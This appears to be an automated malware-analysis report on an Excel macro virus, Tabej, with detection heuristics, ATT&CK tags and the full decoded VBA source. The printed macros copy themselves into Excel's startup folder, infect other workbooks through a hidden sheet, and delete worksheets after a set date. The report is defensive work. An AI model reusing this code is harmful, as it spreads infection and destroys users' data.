MALICIOUS
Risk Score: 220
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The presence of Auto_Open and Auto_Close VBA macros, together with the ClamAV detection 'Xls.Trojan.Tabej-2', strongly indicates malicious intent. The Auto_Open macro attempts to save a copy of itself as 'tabej.xls' in the startup path, suggesting an attempt at persistence. The Auto_Close macro also contains date-gated logic that adds a new worksheet, deletes the existing worksheets and saves the workbook, which could be used for cleanup or further execution.
Heuristics (4)
- ClamAV: Xls.Trojan.Tabej-2 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Xls.Trojan.Tabej-2
- VBA macros detected (medium, 2 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Auto_Open macro (high) [OLE_VBA_AUTO]: Auto_Open macro
- Auto_Close macro (high) [OLE_VBA_AUTOCLOSE]: Auto_Close macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1771 bytes |

SHA-256: b6164b7b7862400fad982a538d45ecdded47bbe7076789dfed776b06d34e4b56
Detection: ClamAV: Xls.Trojan.Tabej-2
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "tabej"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = ""
    If Windows(1).Caption = "tabej.xls" Then Workbooks.Add
    s$ = Application.StartupPath & "\" & "tabej.xls"
    d$ = Dir(s$)
    If Not d$ = "tabej.xls" Then rx
    Application.OnSheetActivate = "inf"
End Sub
Sub rx()
Attribute rx.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.ScreenUpdating = False
    cd$ = CurDir()
    ChDir Application.StartupPath
    ActiveWorkbook.SaveAs filename:=Application.StartupPath & "/" & "tabej.xls"
    ActiveWindow.Visible = False
    ChDir cd$
    Application.ScreenUpdating = True
End Sub
Sub inf()
Attribute inf.VB_ProcData.VB_Invoke_Func = " \n14"
    dt = CSng(Date)
    For x = 1 To ActiveWorkbook.Sheets.Count
        If ActiveWorkbook.Sheets(x).Name = "tabej" Then
            If ActiveWorkbook.Name <> ThisWorkbook.Name Then
                If dt > 36016 Then
                    Application.DisplayAlerts = False
                    ActiveWorkbook.Sheets("tabej").Delete
                    Exit Sub
                    Application.DisplayAlerts = True
                End If
            End If
            Exit Sub
        End If
    Next
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("tabej").Copy before:=ActiveWorkbook.Sheets(1)
    ActiveWorkbook.Sheets("tabej").Visible = False
    Application.ScreenUpdating = True
End Sub
Sub auto_close()
Attribute auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
    dt = CSng(Date)
    If Not ActiveWorkbook Is Nothing Then
        If dt > 36015 Then
            If Worksheets.Count > 0 Then
                Application.ScreenUpdating = False
                Application.DisplayAlerts = False
                Worksheets.Add.Move after:=Worksheets(Worksheets.Count)
                For x = 1 To Worksheets.Count - 1
                    Worksheets(1).Delete
                Next
                ThisWorkbook.Save
            End If
        End If
    End If
    Application.DisplayAlerts = True
    If ThisWorkbook.Name = "tabej" Then Application.OnSheetActivate = ""
End Sub
```